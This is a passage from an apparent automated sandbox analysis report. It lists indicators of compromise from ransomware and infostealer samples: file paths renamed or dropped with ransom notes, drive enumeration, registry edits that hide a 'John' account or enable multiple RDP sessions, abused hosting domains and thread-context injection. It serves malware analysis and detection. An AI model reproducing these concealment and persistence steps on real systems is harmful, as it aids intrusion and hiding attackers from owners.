for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini CoronaVirus.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Music\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Searches\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Public\Libraries\desktop.ini CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI CoronaVirus.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini CoronaVirus.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini CoronaVirus.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Public\AccountPictures\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Documents\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini CoronaVirus.exe File opened for modification C:\Program Files\desktop.ini CoronaVirus.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Links\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini CoronaVirus.exe File opened for modification C:\$RECYCLE.BIN\S-1-5-21-1639757381-2759246526-4253643256-1000\desktop.ini CoronaVirus.exe File opened for modification C:\Program Files (x86)\desktop.ini CoronaVirus.exe File opened for modification C:\svchost\$Recycle.Bin\S-1-5-21-1639757381-2759246526-4253643256-1000\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini CoronaVirus.exe File opened for modification F:\svchost\$RECYCLE.BIN\S-1-5-21-1639757381-2759246526-4253643256-1000\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini CoronaVirus.exe -
Enumerates connected drives 3 TTPs 47 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\P: GandCrab.exe File opened (read-only) \??\R: GandCrab.exe File opened (read-only) \??\U: GandCrab.exe File opened (read-only) \??\i: Cerber5.exe File opened (read-only) \??\j: Cerber5.exe File opened (read-only) \??\I: GandCrab.exe File opened (read-only) \??\L: GandCrab.exe File opened (read-only) \??\T: GandCrab.exe File opened (read-only) \??\Z: GandCrab.exe File opened (read-only) \??\l: Cerber5.exe File opened (read-only) \??\r: Cerber5.exe File opened (read-only) \??\w: Cerber5.exe File opened (read-only) \??\H: GandCrab.exe File opened (read-only) \??\d: Cerber5.exe File opened (read-only) \??\g: Cerber5.exe File opened (read-only) \??\o: Cerber5.exe File opened (read-only) \??\t: Cerber5.exe File opened (read-only) \??\u: Cerber5.exe File opened (read-only) \??\z: Cerber5.exe File opened (read-only) \??\J: GandCrab.exe File opened (read-only) \??\S: GandCrab.exe File opened (read-only) \??\V: GandCrab.exe File opened (read-only) \??\m: Cerber5.exe File opened (read-only) \??\b: Cerber5.exe File opened (read-only) \??\K: GandCrab.exe File opened (read-only) \??\E: SearchHost.exe File opened (read-only) \??\h: Cerber5.exe File opened (read-only) \??\k: Cerber5.exe File opened (read-only) \??\p: Cerber5.exe File opened (read-only) \??\A: GandCrab.exe File opened (read-only) \??\N: GandCrab.exe File opened (read-only) \??\n: Cerber5.exe File opened (read-only) \??\q: Cerber5.exe File opened (read-only) \??\v: Cerber5.exe File opened (read-only) \??\Q: GandCrab.exe File opened (read-only) \??\x: Cerber5.exe File opened (read-only) \??\B: GandCrab.exe File opened (read-only) \??\G: GandCrab.exe File opened (read-only) \??\O: GandCrab.exe File opened (read-only) \??\W: GandCrab.exe File opened (read-only) \??\X: GandCrab.exe File opened (read-only) \??\Y: GandCrab.exe File opened (read-only) \??\s: Cerber5.exe File opened (read-only) \??\y: Cerber5.exe File opened (read-only) \??\a: Cerber5.exe File opened (read-only) \??\D: GandCrab.exe File opened (read-only) \??\M: GandCrab.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 10 IoCs
flow ioc 118 raw.githubusercontent.com 121 iplogger.org 122 iplogger.org 2295 0.tcp.ngrok.io 41 raw.githubusercontent.com 104 raw.githubusercontent.com 119 raw.githubusercontent.com 254 0.tcp.ngrok.io 267 0.tcp.ngrok.io 3446 0.tcp.ngrok.io -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 97 ip-api.com -
Modifies WinLogon 2 TTPs 9 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" Azorult.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList Azorult.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWInst.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "DANGER" Krotten.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Äëÿ òîãî ÷òîáû âîññòàíîâèòü íîðìàëüíóþ ðàáîòó ñâîåãî êîìïüþòåðà íå ïîòåðÿâ ÂÑÞ èíôîðìàöèþ! È ñ ýêîíîìèâ äåíüãè, ïðèøëè ìíå íà e-mail [email protected] êîä ïîïîëíåíèÿ ñ÷åòà êèåâñòàð íà 25 ãðèâåíü.  îòâåò â òå÷åíèå äâåíàäöàòè ÷àñîâ íà ñâîé e-mail òû ïîëó÷èøü ôàèë äëÿ óäàëåíèÿ ýòîé ïðîãðàììû." Krotten.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList Azorult.exe -
Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
-
AutoIT Executable 4 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0007000000028025-823.dat autoit_exe behavioral1/files/0x0007000000028097-876.dat autoit_exe behavioral1/files/0x00070000000280a1-982.dat autoit_exe behavioral1/memory/1996-1117-0x0000000000690000-0x000000000077C000-memory.dmp autoit_exe -
Drops file in System32 directory 64 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\fr-FR\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_RegistryResource\ja-JP\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_ServiceResource\de-DE\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\System32\DriverStore\FileRepository\netg664.inf_amd64_84cd7b2798e0a666\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_WaitForSome\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Windows\SysWOW64\Configuration\BaseRegistration\fr-FR\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\System32\DriverStore\FileRepository\amdsata.inf_amd64_ea60132f1a9a7a62\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\System32\DriverStore\FileRepository\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\SysWOW64\it-IT\Licenses\_Default\EnterpriseS\license.rtf Fantom.exe File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\es-ES\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_WindowsOptionalFeature\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Windows\SysWOW64\IME\IMETC\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\ja-JP\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\SysWOW64\ar-SA\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\System32\DriverStore\FileRepository\mdmc26a.inf_amd64_dd85a83bc442ed33\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\SysWOW64\ja-JP\Licenses\OEM\EnterpriseS\license.rtf Fantom.exe File created C:\Windows\SysWOW64\slmgr\0410\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\SysWOW64\Speech_OneCore\Common\en-US\Tokens_SR_en-US-N.xml Fantom.exe File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\de-DE\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\System32\DriverStore\FileRepository\intelta.inf_amd64_bf3c0f37c937104d\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\System32\DriverStore\FileRepository\mdmracal.inf_amd64_dd534e815632509c\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\System32\DriverStore\FileRepository\prnms006.inf_amd64_c3bdcb6fc975b614\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Windows\SysWOW64\spp\tokens\skus\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\SysWOW64\config\systemprofile\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\System32\DriverStore\uk-UA\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\System32\DriverStore\FileRepository\c_tapedrive.inf_amd64_a3a36e8f2c921ed7\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\System32\DriverStore\FileRepository\dc21x4vm.inf_amd64_3294fc34256dbb0e\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\SysWOW64\ja-JP\Licenses\Volume\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_LogResource\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_PackageResource\uk-UA\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\System32\DriverStore\FileRepository\mdmmc288.inf_amd64_3e3f05a8a446e75f\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\SysWOW64\InstallShield\setupdir\0804\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\SysWOW64\Speech\Engines\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\en-US\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_ServiceResource\ja-JP\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\System32\DriverStore\FileRepository\c_avc.inf_amd64_8ee511eb19322856\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\System32\DriverStore\FileRepository\eaphost.inf_amd64_d37080dfb66d830b\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\System32\DriverStore\FileRepository\mdmtkr.inf_amd64_a8a4ecec7082e1aa\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\System32\DriverStore\FileRepository\prnms007.inf_amd64_8bbf44975c626ac5\Amd64\MSXPS2.xml Fantom.exe File created C:\Windows\System32\DriverStore\FileRepository\usbvideo.inf_amd64_2e062d675086951b\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCClassResources\WindowsPackageCab\uk-UA\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\en\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_RegistryResource\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\SysWOW64\fr-FR\Licenses\_Default\EnterpriseS\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\SysWOW64\Speech_OneCore\Common\ja-JP\tokens_TTS_ja-JP.xml Fantom.exe File created C:\Windows\System32\DriverStore\FileRepository\fidohid.inf_amd64_c446be9403cdcdb1\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\System32\DriverStore\FileRepository\mdmke.inf_amd64_b83f029888180def\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\System32\DriverStore\FileRepository\netloop.inf_amd64_762588e32974f9e8\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\System32\DriverStore\FileRepository\wfcvsc.inf_amd64_8652ff56b01a8c9c\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_WaitForAll\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Windows\SysWOW64\Configuration\Schema\MSFT_FileDirectoryConfiguration\ja-JP\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_EnvironmentResource\ja-JP\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\System32\DriverStore\FileRepository\mdmeric2.inf_amd64_facbddcbb097c790\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Windows\SysWOW64\DiagSvcs\de-DE\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Windows\SysWOW64\en\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\SysWOW64\LogFiles\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Dism\it\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_RoleResource\fr-FR\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\SecureBoot\fr-FR\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\SysWOW64\Com\it-IT\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\System32\DriverStore\FileRepository\sisraid2.inf_amd64_845e008c32615283\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\SysWOW64\en-US\lipeula.rtf Fantom.exe File created C:\Windows\SysWOW64\Speech_OneCore\Common\fr-FR\DECRYPT_YOUR_FILES.HTML Fantom.exe -
Hide Artifacts: Hidden Users 1 TTPs 4 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" regedit.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\john = "0" reg.exe -
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\\\bxmeoengtf.bmp" GandCrab.exe Set value (str) \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\tmpBC15.bmp" Cerber5.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 988 set thread context of 3616 988 Lokibot.exe 398 PID 568 set thread context of 4696 568 RevengeRAT.exe 563 PID 4696 set thread context of 2416 4696 RegSvcs.exe 564 PID 4324 set thread context of 1792 4324 svchost.exe 593 PID 1792 set thread context of 2912 1792 RegSvcs.exe 594 -
resource yara_rule behavioral1/files/0x0007000000028099-936.dat upx behavioral1/files/0x0007000000028098-935.dat upx behavioral1/files/0x00080000000280bd-1052.dat upx behavioral1/memory/3892-1090-0x0000000000400000-0x0000000000419000-memory.dmp upx behavioral1/memory/1996-1117-0x0000000000690000-0x000000000077C000-memory.dmp upx behavioral1/memory/1996-1116-0x0000000000690000-0x000000000077C000-memory.dmp upx behavioral1/memory/3892-1058-0x0000000000400000-0x0000000000419000-memory.dmp upx behavioral1/memory/6044-5885-0x0000000000400000-0x0000000000438000-memory.dmp upx behavioral1/memory/6044-16797-0x0000000000400000-0x0000000000438000-memory.dmp upx -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\A12_Spinner_2x.gif.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\scan_poster.jpg.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E InfinityCrypt.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\joni.md CoronaVirus.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVClientIsv.man CoronaVirus.exe File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ru\System.Xaml.resources.dll.id-BF300B0A.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\zh-Hans\PresentationCore.resources.dll.id-BF300B0A.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\UIAutomationClient.dll.id-BF300B0A.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\BCSRuntimeRes.dll CoronaVirus.exe File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\VisualElements\SmallLogoDev.png.id-BF300B0A.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi420_yuy2_plugin.dll.id-BF300B0A.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\fil.pak.id-BF300B0A.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Windows Media Player\Network Sharing\wmpnss_color48.png CoronaVirus.exe File created C:\Program Files\Microsoft Office\root\Licenses16\PowerPointR_OEM_Perp-ul-phn.xrm-ms.id-BF300B0A.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSOXMLED.EXE.id-BF300B0A.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\pt-br\ui-strings.js.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E CoronaVirus.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui CoronaVirus.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\identity_proxy\win11\identity_helper.Sparse.Stable.msix.id-BF300B0A.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Other-48.png CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdXC2RVL_MAKC2R-ppd.xrm-ms.id-BF300B0A.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sl-si\ui-strings.js.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E.id-BF300B0A.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files (x86)\Briano\UWPHook\Microsoft.Management.Infrastructure.dll.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E.id-BF300B0A.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\cs-cz\ui-strings.js.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E InfinityCrypt.exe File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Net.WebSockets.Client.dll.id-BF300B0A.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\ONENOTE_WHATSNEW.XML CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-runtime-l1-1-0.dll CoronaVirus.exe File created C:\Program Files\VideoLAN\VLC\plugins\access\libdvdread_plugin.dll.id-BF300B0A.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-left-pressed.gif.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E InfinityCrypt.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Reflection.TypeExtensions.dll CoronaVirus.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\pt-BR\UIAutomationTypes.resources.dll.id-BF300B0A.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\zh-Hans\WindowsFormsIntegration.resources.dll CoronaVirus.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ru\Microsoft.VisualBasic.Forms.resources.dll.id-BF300B0A.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files\VideoLAN\VLC\lua\http\requests\status.json.id-BF300B0A.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\es-es\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ja-jp\ui-strings.js.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E InfinityCrypt.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\api-ms-win-core-file-l1-2-0.dll.id-BF300B0A.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019R_OEM_Perp-ppd.xrm-ms CoronaVirus.exe File opened for modification C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui CoronaVirus.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\de-de\ui-strings.js.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E CoronaVirus.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\cs-cz\ui-strings.js.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E.id-BF300B0A.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\s_close2x.png.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E.id-BF300B0A.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\sl-si\ui-strings.js.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E.id-BF300B0A.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProO365R_SubTrial-ppd.xrm-ms.id-BF300B0A.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Client.Models.dll.id-BF300B0A.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RMNSQUE\RMNSQUE.INF.id-BF300B0A.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\widevinecdmadapter.dll.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E.id-BF300B0A.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\adodb.dll.id-BF300B0A.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\swiftshader\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\Locales\qu.pak.id-BF300B0A.[[email protected]].ncov.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E InfinityCrypt.exe 